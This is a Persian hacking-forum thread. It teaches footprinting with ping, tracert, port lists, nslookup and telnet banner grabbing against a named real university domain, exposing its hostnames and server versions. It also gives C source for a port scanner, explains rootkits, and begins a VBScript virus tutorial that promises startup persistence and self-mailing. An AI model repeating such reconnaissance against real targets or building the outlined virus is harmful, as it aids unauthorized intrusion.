کنيد يا چهارمی چون همديگر رو ساپورت می‌کنند. ping چيست ؟ ping دستوری است که مشخص می‌کند که آيا يک کامپيوتر خاص که ما ip يا domain آن را می‌دانيم، روشن و فعال (Active) هست يا نه. و اينکه اگر فعال باشد مدت زمان رسيدن بسته‌های tcp/ip از آن کامپيوتر به کامپيوتر ما چقدر است. کاربرد اين دستور به صورت زير است: ping ip-or-domain که به جای ip-or-domain بايد شماره ip و يا domain آن(اگر داشته باشد) را می‌گذاريم. مثلا ping prdev.com را در command prompt تايپ کردم و به نتايج زير رسيدم : Pinging prdev.com [63.148.227.65] with 32 bytes of data: Reply from 63.148.227.65: bytes=32 time=1402ms TTL=105 Reply from 63.148.227.65: bytes=32 time=941ms TTL=105 Reply from 63.148.227.65: bytes=32 time=981ms TTL=105 Reply from 63.148.227.65: bytes=32 time=851ms TTL=105 Ping statistics for 63.148.227.65: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 851ms, Maximum = 1402ms, Average = 1043ms اين نتايج نشان می‌دهد که prdev.com فعال است. حالا به کامپيوتری با ip شماره 63.148.227.65 (که همان prdev.com است)، ping می‌کنم. نتايج همان است فقط با تغييراتی در سطر اول. (البته time که معنای مدت زمان رسيدن پکت را می‌دهد، با توجه به ترافيک شبکه، کم و زياد خواهد شد). برای ping کردن به اين ip ، دستور 63.148.227.65 ping را صادر می‌کنم : Pinging 63.148.227.65 with 32 bytes of data: Reply from 63.148.227.65: bytes=32 time=861ms TTL=105 Reply from 63.148.227.65: bytes=32 time=852ms TTL=105 Reply from 63.148.227.65: bytes=32 time=851ms TTL=105 Reply from 63.148.227.65: bytes=32 time=881ms TTL=105 Ping statistics for 63.148.227.65: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 851ms, Maximum = 881ms, Average = 861ms فرض کنيد که به يک ip که فعال نيست، ping کنيم: Pinging 217.66.196.1 with 32 bytes of data: Request timed out. Request timed out. Request timed out. Request timed out. Ping statistics for 217.66.196.1: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms که نشان می‌دهد که آن ip در آن لحظه فعال نيست. البته تمام مطالبی که در بالا ذکر شد، در حالتی است که مستقيما به اينترنت وصل شده‌ايد و يا اگر از طريق شبکه محلی به اينترنت وصل هستيد، شبکه شما به درستی پيکربندی شده باشد. اصولا ping يکی از بهترين دستورات برای پيدا کردن ايراد در شبکه است. tracert چيست ؟ tracert ( در يونيکس می‌شود traceroute ) ابزاری است که نشان می‌دهد که يک packet اطلاعاتی از کامپيوتر شما چه مسيری را طی می‌کند و از چه کامپيوترهايی می‌گذرد تا به يک مقصد خاص برسد. مقصد را ما مشخص می‌کنيم و معمولا همان کامپيوتری است که داريم footprinting می‌کنيم. کاربرد اين دستور به صورت زير است: tracert ip-or-domain مثلا می‌خواهم ببينم که از چه کامپيوترهايی بايد رد شويم تا به prdev.com برسيم. برای اينکار می‌توان از يکی از دستورهای زير استفاده کرد: tracert prdev.com tracert 63.148.227.65 به نتيجه زير رسيدم: Tracing route to prdev.com [63.148.227.65] over a maximum of 30 hops: 1 160 ms 160 ms 160 ms 217.218.84.3 2 381 ms 691 ms 1772 ms 217.218.84.5 3 * * 2324 ms 217.218.77.1 4 201 ms 1101 ms 180 ms 217.218.0.252 5 341 ms 220 ms 180 ms 217.218.0.2 6 1993 ms 180 ms 181 ms 217.218.158.41 7 180 ms 160 ms 160 ms 195.146.63.101 8 2824 ms * * 195.146.32.134 9 1472 ms 1463 ms 871 ms 195.146.33.73 10 791 ms 841 ms 811 ms if-1....eglobe.net [207.45.218.161] 11 1692 ms * 2654 ms if-4-....eglobe.net [207.45.222.77] 12 1282 ms 891 ms 1052 ms if-1-....globe.net [207.45.220.245] 13 902 ms 931 ms 881 ms if-15.....globe.net [66.110.8.134] 14 931 ms 861 ms 871 ms if-8-....leglobe.net [64.86.83.174] 15 901 ms 841 ms 852 ms if-5-.....globe.net [207.45.223.62] 16 841 ms 862 ms 851 ms pos6-.....vel3.net [209.0.227.33] 17 841 ms 842 ms 941 ms so-4-1.....vel3.net [209.247.10.205] 18 882 ms 931 ms 851 ms so-0-1....vel3.net [209.247.11.197] 19 871 ms 891 ms 951 ms gige9....vel3.net [209.247.11.210] 20 1011 ms 851 ms 902 ms unknown.Level3.net [63.208.0.94] 21 852 ms * 882 ms 64.156.25.74 22 961 ms 942 ms 841 ms 63.148.227.65 Trace complete. اين نتايج نشان می‌دهد که بايد از ۲۲ کامپيوتر بگذرم تا به prdev.com برسم. اين اطلاعات همان‌طور که بعدا خواهيد ديد، حاوی اطلاعات زيادی برای پيدا کردن فايروال‌ها و ... است. (بعضی سطرها رو کوتاه کردم و به‌جاش .... گذاشتم) tracert دارای تعدادی switch است که دوتاش رو توضيح می‌دم: d- == > با استفاده از اين سويچ در نتايج حاصله فقط ip ها نمايش داده می‌شود. مثلا می‌نويسيم: tracert prdev.com -d h max-hops- ==> حداکثر تعداد گام‌ها را تعيين می‌کند. حالت پيش‌فرض ۳۰ است. مثلا می‌نويسيم: tracert prdev.com -h 50 از اين دستور بعدا بسيار استفاده خواهيم کرد. تکميل ليست پورت‌ها قبلا در مورد مهمترين پورت‌ها صحبت کردم. حالا يک ليست کامل‌تر را در اين درس مي‌گم. اگر مي‌خواهيد يک مرجع نسبتا کامل براي مراجعه داشته باشيد، اينجا را کليک کنيد. دقت کنيد این درس و نيز لينک بالا هيچ بحثي در مورد تروجان‌ها نمي‌کند زيرا تروجان‌هاي شناخته شده هم يک سري پورت پيش‌فرض دارند که در جاي خود بحث خواهد شد. Ports TCP/UDP Service or Application ------ ------- ---------------------------------------- 7 tcp echo 11 tcp systat 19 tcp chargen 21 tcp ftp-data 22 tcp ssh 23 tcp telnet 25 tcp smtp 42 tcp nameserver 43 tcp whois 49 udp tacacs 53 udp dns-lookup 53 tcp dns-zone 66 tcp oracle-sqlnet 69 udp tftp 79 tcp finger 80 tcp http 81 tcp alternative for http 88 tcp kerberos or alternative for http 109 tcp pop2 110 tcp pop3 111 tcp sunrpc 118 tcp sqlserv 119 tcp nntp 135 tcp ntrpc-or-dec 139 tcp netbios 143 tcp imap 161 udp snmp 162 udp snmp-trap 179 tcp bgp 256 tcp snmp-checkpoint 389 tcp ldap 396 tcp netware-ip 407 tcp timbuktu 443 tcp [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] 445 tcp ms-smb-alternate 445 udp ms-smb-alternate 500 udp ipsec-internet-key-exchange (ike) 513 tcp rlogin 513 udp rwho 514 tcp rshell 514 udp syslog 515 tcp printer 515 udp printer 520 udp router 524 tcp netware-ncp 799 tcp remotely possible 1080 tcp socks 1313 tcp bmc-patrol-db 1352 tcp notes 1433 tcp ms-sql 1494 tcp citrix 1498 tcp sybase-sql-anywhere 1524 tcp ingres-lock 1525 tcp oracle-srv 1527 tcp oracle-tli 1723 tcp pptp 1745 tcp winsock-proxy 2000 tcp remotely-anywhere 2001 tcp cisco-mgmt 2049 tcp nfs 2301 tcp compaq-web 2447 tcp openview 2998 tcp realsecure 3268 tcp ms-active-dir-global-catalog 3268 udp ms-active-dir-global-catalog 3300 tcp bmc-patrol-agent 3306 tcp mysql 3351 tcp ssql 3389 tcp ms-termserv 4001 tcp cisco-mgmt 4045 tcp nfs-lockd 5631 tcp pcanywhere 5800 tcp vnc 6000 tcp xwindows 6001 tcp cisco-mgmt 6549 tcp apc 6667 tcp irc 8000 tcp web 8001 tcp web 8002 tcp web 8080 tcp web 9001 tcp cisco-xremote 12345 tcp netbus 26000 tcp quake 31337 udp backorifice 32771 tcp rpc-solaris 32780 udp snmp-solaris 43188 tcp reachout 65301 tcp pcanywhere-def ادامه بحث telnet telnet هم جزو مواردي است که در footprinting مورد استفاده قرار مي‌گيرد. کاربرد آن در حالتيست که بخواهيم بدانيم که روي فلان پورت چه برنامه‌اي فال‌گوش‌ه و version آن چنده. به اين صورت که به يک پورت خاص (که مي‌دانيم روي آن سرور باز است) تلنت مي‌کنيم و بعد مي‌بينيم که نتايجي ظاهر مي‌شود که نشان‌دهنده اطلاعاتي‌ است که به‌کار مي‌رود. گاهي با مکثي طولاني مواجه مي‌شويم و هيچ چيزي نمايش داده نمي‌شود، در اين حالت يکي دوبار , Ctrl+Z , Ctrl+D , Ctrl+C , Ctrl+break را مي‌زنيم و خارج مي‌شويم. در مثال پايين جمع‌بندي مواردي که تا حالا از footprinting گفته‌ام را مي‌آورم. جمع‌بندي مطالب گفته شده و بررسي يک سايت فرض کنيد مي‌خواهيم در مورد [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] اطلاعاتي کسب کنيم : ◊ اول به سايت پينگ مي‌کنم و ip آن را به‌دست مي‌آورم: 194.225.184.15 ◊ به کمک ip که به‌دست آورديم، به کمک يک پورت اسکنر پورت‌ها را بررسي مي‌کنيم و مي‌بينيم که پورت‌هايي مثل ۲۱، ۲۵، ۴۲، ۵۳، ۸۰، ۱۱۰، ۱۱۹، ۱۳۹، ۱۴۳ و ... باز است. ◊ چون domain به ir ختم مي‌شود، براي whois کردن از whois.nic.ir استفاده مي‌کنم و Name Server آن را به دست مي‌آورم که 194.225.184.20 است. ◊ به کمک اين Name Server ، يک nslookup مي‌کنم و به نتايج زير مي‌رسم: iums.ac.ir. SOA sina.i........0 345600) iums.ac.ir. NS sina.iums.ac.ir iums.ac.ir. NS ns1.nic.ir iums.ac.ir. MX 10 sina.iums.ac.ir smtp.iums.ac.ir. A 195.146.34.181 sina.iums.ac.ir. HINFO Sun-SuperSPARC5/75 UNIX-Solaris-2.6 sina.iums.ac.ir. MX 10 sina.iums.ac.ir sina.iums.ac.ir. A 194.225.184.20 sina.iums.ac.ir. A 195.146.34.181 sun.iums.ac.ir. CNAME sina.iums.ac.ir cisco.iums.ac.ir. CNAME router.iums.ac.ir webmail.iums.ac.ir. A 195.146.34.181 linux.iums.ac.ir. A 194.225.184.19 linux.iums.ac.ir. HINFO Intel-Xeon/800 RedHat-Linux-7.2 mta.iums.ac.ir. A 195.146.34.181 pop3.iums.ac.ir. CNAME sina.iums.ac.ir localhost.iums.ac.ir. A 127.0.0.1 proxy.iums.ac.ir. CNAME arvand.iums.ac.ir [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] A 195.146.34.180 atrak.iums.ac.ir. A 194.225.184.14 ns1.iums.ac.ir. CNAME sina.iums.ac.ir arvand.iums.ac.ir. A 194.225.184.13 router.iums.ac.ir. A 194.225.184.1 router.iums.ac.ir. HINFO Cisco3640/Access-Server IOS-IP-12.0 iums.ac.ir. SOA sina.iu.......3456000 345600) تک تک سطرهاي اين نتايج کاربرد دارد که خواهيم رسيد. الان فقط در مورد HIFNO صحبت مي‌کنم که براي مشخص تر بودن در بالا به صورت کمي فرورفته‌تر نوشتم. مثلا: sina.iums.ac.ir. HINFO Sun-SuperSPARC5/75 UNIX-Solaris-2.6 HIFNO براي تعيين نوع کامپيوتر و سيستم‌عامل سرور اهميت دارد. در اين سطر مشخص است که sina.iums.ac.ir از Sun-SuperSPARC5/75 UNIX-Solaris-2.6 استفاده مي‌کند. ◊ چون پورت‌هاي باز را هم توسط پورت اسکنر به دست آورده‌ام به آنها تلنت مي‌کنم با دستور: telnet [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] portnum نتايج حاصل از بعضي را مي‌بينيد: 25 : ... master.iums.ac.ir Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready at 220 پس پورت ۲۵ (smtp) در آن کامپيوتر از Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 استفاده مي‌کند. 110 : .OK Microsoft Exchange 2000 POP3 server version 6.0.5762.3 (master.iums.ac.ir) ready+ پس پورت ۱۱۰ (pop3) در آن کامپيوتر از Microsoft Exchange 2000 POP3 server version 6.0.5762.3 استفاده مي‌کند. 119 : NNTP Service 5.00.0984 Version: 5.0.2195.2966 Posting Allowed و ... يادآوری قبلا گفتم که برای اينکه هکر خوبی بشيد، زبان C را بايد ياد بگيريد. امروز اولين برنامه اينترنتی خود را به زبان C شروع می‌کنيم.برنامه‌ای که امروز می‌نويسيم، يک پورت اسکنر ساده (Simple Port Scanner) است که acw_spscan.exe نام دارد. acw يعنی Artawill Commandline Windows و spscan يعنی Simple Port Scanner. من سورس اين برنامه را با Borland C++ 5.02 کامپايل کردم ولی فکر کنم روی هر نوع کامپايلر C ويندوز کار کند. يک سری نکات در مورد هر برنامه‌ای که با C برای ويندوز خواهم نوشت هست که فقط امروز می‌گم و بعدا ديگه اشاره نخواهم کرد. ۱- هر برنامه‌ای که من می‌نويسم، شامل دو فايل است که بايد داون‌لود کنيد: فايل اصلی که پسوند C يا CPP دارد و يک فايل به يکی از نامهای acw_sock.h يا agw_sock.h يا acu_sock.h ويا axu_sock.h که با توجه به نوع سيستم‌عامل (ويندوز يا يونيکس) و نوع ظاهر برنامه (خط‌ فرمان يا گرافيکی) يکی از اين چهارتا خواهد بود. اگر برنامه برای ويندوز نوشته شده است، بايد قبل از کامپايل نهايی فايل WS2_32.LIB را هم به پروژه اضافه کنيد. ۲- هر بار که برنامه جديدی خواهم نوشت فايلی که پسوند h دارد، کامل و کامل‌تر می‌شود، پس هر وقت يک فايل جديد C يا CPP داون‌لود می‌کنيد، فايل h مربوطه را هم داون‌لود کنيد. ۳- کامپايلر مورد استفاده در برنامه‌های ويندوز Borland C++ 5.02 است. اگر از کامپايلر ديگری استفاده می‌کنيد، ممکن است لازم باشد که تغييراتی اعمال کنيد. ۴- سورس تمام توابع و برنامه‌ها مشمول کپی‌ رايت است ولی استفاده از توابع در برنامه‌هايتان در صورت عدم اعمال تغييرات در سورس بلامانع است. درباره برنامه Artawill Command-prompt Windows - Simple Prot Scanner = acw_spscan برنامه acw_spscan.exe عمل پورت اسکنينگ را به صورت tcp و udp انجام می‌دهد. همانطوری که از نامش پيداست، برای ويندوز و به‌صورت خط فرمان عمل می‌کند. اگر در command prompt تايپ کنيد: acw_spscan ،خطوط زير چاپ می‌شود: Artawill Command-line Windows SimplePortScanner (acw_spscan.exe) v1.0 Programmed by Araz Samadi, ArtaWill.com Usage: acw_spscan [] بنابراين مثلا اگر بخواهم سايت پی آر دو را (که ip آن 63.148.227.65 است) برای پورت‌های ۲۰ تا ۳۰ به صورت tcp اسکن کنم، بايد بنويسم: acw_spscan 63.148.227.65 20 30 tcp و جواب می‌شنوم: Artawill Command-line Windows SimplePortScanner (acw_spscan.exe) v1.0 Programmed by Araz Samadi, ArtaWill.com >TCP [63.148.227.65] TCP 21 : OPEN [63.148.227.65] TCP 25 : OPEN Simple Port Scanner End. که نشان می‌دهد، پورت‌های ۲۱ و ۲۵ باز است. بررسی سورس برنامه من برای راحتی کار برنامه‌نويسی شبکه، يک سری تابع تعريف کرده و آنها را در فايل acw_sock.h قرار داده‌ام که در برنامه اصلی آن را include می‌کنم. حال به بررسی توابع مورد استفاده در برنامه امروز می‌پردازم ( اگر خواهان اطلاعات بيشتری هستيد، سورس اين توابع را از فايل acw_sock.h بخوانيد ): ۱- (int arta_win_LoadWinsock(char, char ==> در برنامه‌نويسی ويندوز قبل از استفاده از سوکت(socket)، بايد WinSock را لود کرد که من اين کار را با اين تابع انجام می‌دهم. اگر بپرسيد سوکت چيست، می‌گويم سوکت ارتباطی است از نوع TCP/IP که از پورت خاصی از يک کامپيوتر به سوی يک پورت خاص از يک کامپيوتر ديگر برای رد و بدل کردن داده‌ها ايجاد می‌شود. کل برنامه‌نويسی شبکه به کمک C با استفاده از سوکت‌هاست. if(arta_win_LoadWinsock(2,0)==-1) arta_commandline_win_DieWithError("ERR: Cannot load WinSock!"); دو خط بالا برای لودکردن WinSock ورژن 2.0 به‌کار می‌رود. ۲- (void arta_win_CleanWinsock(void ==> در آخر برنامه بايد WinSockی را که با دستور بالا ايجاد کرده‌ايم، به‌کمک دستور اين قسمت ببنديم: arta_win_CleanWinsock(); ۳- (int arta_win_CreateTcpSocket(void ==> اين تابع يک سوکت از نوع tcp ايجاد می‌کند. if((sock=arta_win_CreateTcpSocket())==-1) arta_commandline_win_DieWithError("ERR: Cannot Create Socket!"); دو خط بالا برای ايجاد يک سوکت tcp به‌کار می‌رود. ۴- (int arta_win_CreateUdpSocket(void ==> اين تابع يک سوکت از نوع udp ايجاد می‌کند. if((sock=arta_win_CreateUdpSocket())==-1) arta_commandline_win_DieWithError("ERR: Cannot Create Socket!"); دو خط بالا برای ايجاد يک سوکت udp به‌کار می‌رود. ۵- (void arta_win_CloseSocket(int ==> اين تابع، سوکتی را که با يکی از دو دستور بالا ايجاد کرده‌ايم، می‌بندد. arta_win_CloseSocket(sock); ۶- void arta_win_CreateServerAddressStructure (* struct sockaddr_in *, unsigned short, char ) ==> اين تابع اطلاعات لازم برای برقراری اتصال را مانند IP, Port می‌گيرد و در يک structure مخصوص از نوع sockaddr_in قرار می‌دهد. اين structure در توابع بعدی به‌کار می‌رود. arta_win_CreateServerAddressStructure(&addr,port,IP); ۷- (* int arta_win_EstablishTcpSocketConnection(int, struct sockaddr_in ==> اين تابع sock (که از تابع‌های ۳ يا ۴ به‌دست آمده) و addr را (که از تابع ۶ حاصل شده) می‌گيرد و يک ارتباط واقعی tcp تشکيل می‌دهد. اگر ارتباط به‌وجود آمد، پورت باز است وگرنه بسته است. if(arta_win_EstablishTcpSocketConnection(sock, &addr)==-1){ .... } ۸- (* int arta_win_EstablishUdpSocketConnection(int, struct sockaddr_in ==> اين تابع sock (که از تابع‌های ۳ يا ۴ به‌دست آمده) و addr را (که از تابع ۶ حاصل شده) می‌گيرد و يک ارتباط واقعی udp تشکيل می‌دهد. اگر ارتباط به‌وجود آمد، پورت باز است وگرنه بسته است. if(arta_win_EstablishUdpSocketConnection(sock, &addr)==-1){ .... } حالا يک توضيح کلی می‌دم: اولين سطرهای برنامه را بررسی می‌کنم /* An ArtaWill Production - copyright(c) ArtaWill.com */ /* Programmed by: M.E */ /* This Source code and its Functions can be used - but no .... */ /* Funcions source or code can be done ! */ #include /* for printf(), fprintf() */ #include /* for exit() */ #include /* for strings */ #include "acw_sock.h" void main(int argc, char *argv[]) { struct sockaddr_in addr; char *IP; int sock; int port; int startport, endport; int tcp_udp_both=1; arta_commandline_win_StartMessage("SimplePortScanner ......"); if ((argc != 4) && (argc != 5)) /* Test for correct ...... */ { arta_commandline_win_DieWithError("Usage: acw_spscan []\n"); exit(1); } IP = argv[1]; startport = atoi(argv[2]); endport = atoi(argv[3]); if(argc==5){ if(stricmp(argv[4],"udp")==0){tcp_udp_both=2;} else if (stricmp(argv[4],"both")==0){tcp_udp_both=3;} } if(arta_win_LoadWinsock(2,0)==-1) arta_commandline_win_DieWithError("ERR: Cannot load WinSock!"); اوايل برنامه يه‌سری توضيحات بعدش يک سری هدر (header) را include کرده‌ام از جمله acw_sock.h را بعدش main شروع می‌شود و يک سری تعريف متغير داريم که به نوع اين متغير ها دقت کنيد. بعد از روی ورودی خط‌ فرمان، متغير‌ها ست می‌شوند. دو سطر آخر هم يک WinSock لود می‌کند. حالا ادامه: if(tcp_udp_both!=2){ puts(">TCP"); for(port=startport;port<=endport;port++){ printf(" [%s] TCP %5d : Testing... ",IP,port); if((sock=arta_win_CreateTcpSocket())==-1) arta_commandline_win_DieWithError("ERR: Cannot Crea...."); arta_win_CreateServerAddressStructure(&addr,port,IP); if(arta_win_EstablishTcpSocketConnection(sock, &addr)==-1){ printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b........"); } else{ printf("\b\b\b\b\b\b\b\b\b\b\b"); printf("OPEN \n"); } arta_win_CloseSocket(sock); } } اگر قرار باشد که tcp چک شود، اين خطوط اجرا می‌شوند. در اين سطرها يک اتصال tcp خاص بايد ايجاد شود و اگر اين عمل موفق بود، آن پورت باز است. حالا ادامه برنامه: if(tcp_udp_both!=1){ puts(">UDP "); for(port=startport;port<=endport;port++){ printf(" [%s] UDP %5d : Testing... ",IP,port); if((sock=arta_win_CreateUdpSocket())==-1) arta_commandline_win_DieWithError("ERR: Cannot Cre....!"); arta_win_CreateServerAddressStructure(&addr,port,IP); if(arta_win_EstablishUdpSocketConnection(sock, &addr)==-1){ printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b....."); } else{ printf("\b\b\b\b\b\b\b\b\b\b\b"); printf("OPEN \n"); } arta_win_CloseSocket(sock); } } همان کارها را ولی اين‌بار برای udp انجام می‌دهد. و حالا آخر برنامه: puts("\n"); arta_commandline_win_EndMessage("Simple Port Scanner"); arta_win_CloseSocket(sock); arta_win_CleanWinsock(); exit(0); } در اينجا پيغام انتهايی چاپ شده و سوکت بسته می‌شود.
گرفته شده ازسایت:[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] نظر یادت نره

mazi_z_PSP
08-05-2007, 12:49
اگر فكر مي كرده ايد كه ويروسها، برنامه هاي جاسوسي، و هكرها تنها خطرات اينترنت هستند
اشتباه مي كنيد. نوع ديگري از تهديد كامپيوتري وجود دارد كه به طور ساكت و پنهاني عمل
مي كند و اكثر مردم از حضور آنها وقتي آگاه مي شوند كه ديگر خيلي دير شده است . اين تهديدبه روت کيت (rootkit) مشهور است، كه روز به روز توجه به آن بيشتر مي شود و از دنياي يونيكسوارد دنياي ويندوز شده است.

روت کيت چيست؟

روت كيت به هر برنامه اي گفته مي شود كه به روشهاي زير كار ميكند:

1.تهاجمي: روت كيت از طريق يك تظاهر نادرست وارد كامپيوتر مي شود، گاهي با نقاب
يك برنامه ديگر يا از طريق يك نصب ساکت

2.پنهاني: روت كيتها با بهره گيري از تكنيكهاي مختلف خودشان را نه تنها از نظر كاربر پنهان
مي سازند بلكه سعي مي كنند سيستم عامل نيز آنها را شناسايي نكند . سيستم فايل نمي تواندفايلهايي را كه روت كيت را تشكيل مي دهند ببيند، و حتي اگر اين فايلها آشكار باشند، آنها ممكن است رمزنگاري شده باشند يا چندچهره باشند . (به عنوان مثال، آنها خودشان را براي جلوگيري از شناسايي رمزي ميکنند )

3.بي اجازه : وقتي روت كيتها خودشا ن را نصب مي كنند، به اجراي كارهايي ادامه مي دهند كه بهاحتمال زياد شما هيچ وقت دوست نداريد روي بدهند. اين كارها مي تواند شامل ثبت كليدزنيها وارسال آنها به يك شخص ثالث، گروگان گيري داده ها (مثلاً محتويات نهانگاه برنامه مرورگر يا ايميل)،ايجاد تداخل با عمليات عادي كامپيوتر و مانند آن باشد.
بعضي از مردم روت كيت را به عنوان وسيله اي تعريف مي كنند كه خودش يا ساير داده هاي روي يك سيستم را پنهان مي كند، اما اكثر روت كيتهاي موجود، ديگر فقط اسباب بازيهايي نيستند كه بخواهند حضور خود را اثبات كنند. آنها شرارت مي كنند، و اگر با يكي از آنها برخورد كنيد لازماست بدانيد كه عليه چه چيزي بايد اقدام كنيد. كلمهroot در rootkit از دنياي يونيكس آمده است ، كه در آن حساب مدير سيستم را (root ) مينامند. اگر يك خدمات دهنده (server ) يونيكس هك شود ، يا به گونه اي از دنياي خارج به مخاطره بيفتد كه يك كاربر غيرمجاز بتواند به عنوان root فرمان صادر كند، گفته مي شود كه.« خدمات دهنده روت شده است » مجموعه root اوليه احتمالاً يك مجموعه از برنامه هاي خدماتي معمولي يونيكس به منظور هك كردن بدون به جاي گذاشتن هيچ ردپايي بوده است . در ميان اينها ابزار تغيير دادن كلمه هاي عبور حسابها بود؛ اگر فهرست كلمه هاي عبور به طور پنهاني فاش ميشد،هر كسي مي توانست كامپيوتر مسئله دار را دستيابي کند.

روت كيتها و ويروسها نقاط اشتراك فراواني دارند، به ويژه از لحاظ طرز كار، اما در چگونگي گسترش خود تفاوت مي كنند. روت كيتها معمولاً به گونه اي ساكت روي يك سيستم خاص گسترش مي يابند. چنين سيستمي مي تواند يككامپيوتر حاوي داده هاي حساس باشد كه كسيديگر به دنبال آنهاست (فايلها، كليدزنيها، داده ها،و مانند آن ). در مقابل ، ويروسها آزادانه و بي قاعده گسترش مي يابند و سعي مي كنند كه روي يك سيستم تا جاي ممكن خرابي به بار بياورند . رو تكيتها معمولاً روي يك سيستم جا خوش مي كنند و خيلي زياد منتشر نمي شوند. با اين همه، ويروسها در حال حاضر شروع به استفاده از سبك پنهان كاري روت كيتها كرده اند و دست كم يك برنامة جاسوسي وجود دارد كه خودش را از نظر كاربر و سيستم عامل با حيله اي به سبك روت كيت پنهان مي سازد

shirazhaker
08-05-2007, 12:59
عزيز دل من اينا چيه گزاشتي چه ربطي به ويروس نويسي با وي بي داره مطالب خوبي و هم قديمي هم اينكه بيشتر تروجان هستن.
ويروس به يك فايل مخرب براي هعمال كارهاي كه باعث از بين رفتن اطلاعات و يا ربودن انها به كار ميرود .مهمتر بارزه ويروس اين هست كه بتونه توليد مثل و انتشار پيدا كنه كه اينا ندارن

mazi_z_PSP
08-05-2007, 16:06
خوب عزيز قدم به قدم. تروجان هم از خانواده ويروس ها هستش. در کل باشه مقاله هايه بعدی رو برايه وی بی ميزارم

mazi_z_PSP
08-05-2007, 16:18
نوشتن ويروس های VbScript برای شروع کار بايد حداقل يکم برنامه نويسی با زبون های هم خانواده با بيسيک (VbScript, Visual Basic ,...) و ديگه کم کم يه زبون برنامه نويسی ديگه رو بلد باشيد. اگر اينطور نيست خوب اشکال نداره قبلا فکر اينجاش رو هم کردم. اول يه نگاه به اين سايتی که خودم درستش کردم بنداز ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])(آموزش VbScript)‌ بعدا بيا شروع کن از همين جا خوندن. هيچی هم نداره فقط ۴ يا ۵ صفحه مطلب مهم داره که اصلا احتياج به تمرين و... هم نيست فقط اون رو بخونيد سرنخ بياد دستتون و بعد شروع کنيد. البته اين سايتم ناکامل موند و نتونستم ادامش بدم ولی ديگه عيب نداره حالا همون چندتا مطلب اولش رو بخونيد بسه. در ضمن اين سايتی رو که ساختم خدايی آخرشه نه؟
۱- اولين گام در ساخت ويروس VbScript
خوب حالا ميايم بحث می کنيم ببينيم اصلا ويروس VbScript چيه؟ شايد شما يک سری از کدهای VbScript رو قبلا در ديده باشيد و يا در صفحات وبلاگتون استفاده کرده باشيد (مثلا برای نمايش پيام خوش آمدگويی و...) ويروس هايی رو که ما می خواهيم با VbScript بنويسيم نيز همون کدها هستند ولی بجای استفاده اونها در صفحات وب اونها رو در فايل هايی با پسوند vbs ذخيره می کنيم. اين نوع ويروس ها خوبيش اينه که ديگه احتياج به کامپايلر نداره يعنی شما کد مورد نظر رو در يک نرم افزار اديت مثل Notepad می نويسيد و با پسوند "vbs" ذخيره می کنيد فايل ايجاد شده مانند يه فايل اجرايی عمل می کنه و تقريبا می تونه خيلی از نيازهای شما رو برآورده کنه (خوش بحال اونايی که حال نصب برنامه های خفن رو ندارن). حالا برای اينکه خوب متوجه بشين يه مثال ميزنم. کد زير رو در notepad کپی کنيد و با پسوند "vbs" ذخيره کنيد و بعد هم اجراش کنيد:
temp = InputBox("Hey, What is your name?",1)
MsgBox "Oh, sorry. Hi "+temp+"."شايد بعضی ها بگن "اين که همون کدهايی است که ما تو سايت يا وبلاگمون استفاده می کنيم, خودش هم که ميگه ميشه اونارو تو صفحات وب هم بکار برد پس حتما ميشه ويروس ها رو توی صفحات وب قرار داد؟" بله تقريبا همونه و حدس شما هم درسته ويروس های نوشته شده با VbScript رو ميشه تو صفحات وب هم بکار برد, اما يسری مشکلات پيش مياد مثلا در صفحات وب اعمالی که ويروس روی سيستم می تونه انجام بده محدوده و برای انجام بقيشون از کاربر اجازه خواسته ميشه و اين يعنی آخر تابلو. ولی اگر همون کد رو در فايلی که گفتم ذخيره کنيد می بينيد که بدون هيچ مشکلی عمليات انجام خواهد شد.
حالا اينجا يه سوال بوجود مياد. من فکر می کنم خيلی ها Visual Basic رو بلدند و خيلی ها هم می توانند تا اندازه لازم اين کدهايی رو که من خواهم نوشت متوجه بشن برای همين هم يادگيری VbScript رو به عهده خدتون گذاشتم. اما اگر شما جور ديگه ای فکر می کنيد برام بنويسيد تا اصلا خود VbScript رو هم با اين آموزش ها همراه کنم.(يکم طولانی تر می شه ولی مطمئنا خيلی بهتر متوجه مطلب می شی) پس حتما نظرت رو بگو! اين زير هم يه نمونه معمولی از کدهای رو گذاشتم ببين اگه از اين سر در مياری مطمئنا بقيه کدها رو هم متوجه ميشی.

Dim Fso, Drives, Drive, Folder, Files, File, Subfolders,Subfolder
Set Fso=createobject("scripting.filesystemobject")
Set Drives=fso.drives
For Each Drive in Drives
If drive.isready then
msgbox drive
end If
Next

mazi_z_PSP
08-05-2007, 16:18
سلام. خانمها آقايون به خاطر پيام ها نظرات و درخواست های بی کران و بی اندازه و بی نهايت و... (قربونش برم دريغ از ۱ دونه) شما تصميم بر آن شده که آموزش نوشتن ويروس های VbScript به همراه آموزش فرامين VbScriptای باشه که بکار برده می شن. پس ديگه لازم نيست VbScript بلد باشيد[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] خوب حالا ديگه ميرم سر اصل مطلب: در قسمت قبل ساختار کلی فايل های vbs که ويروس های VbScript در اين قالب هستند رو توضيح دادم و الان بايد ساختار خود ويروس های VbScript رو توضيح بدم.
ساختار کلی ويروس های VbScript
منظور از ساختار اينکه بيايم برسی کنيم ببينيم اصلا يه ويروس VbScript چه کارا می تونه بکنه!
<LI dir=rtl>دستکاری رجيستری برای اجرای ويروس در هر بار راه اندازی ويندوز
<LI dir=rtl>ارسال خود به ايميل های موجود در آدرس ليست Outlook
